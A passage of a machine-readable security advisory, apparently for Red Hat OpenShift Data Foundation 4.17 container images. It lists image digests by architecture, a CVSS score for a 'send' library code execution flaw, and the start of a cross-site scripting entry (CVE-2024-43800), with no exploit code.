"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", 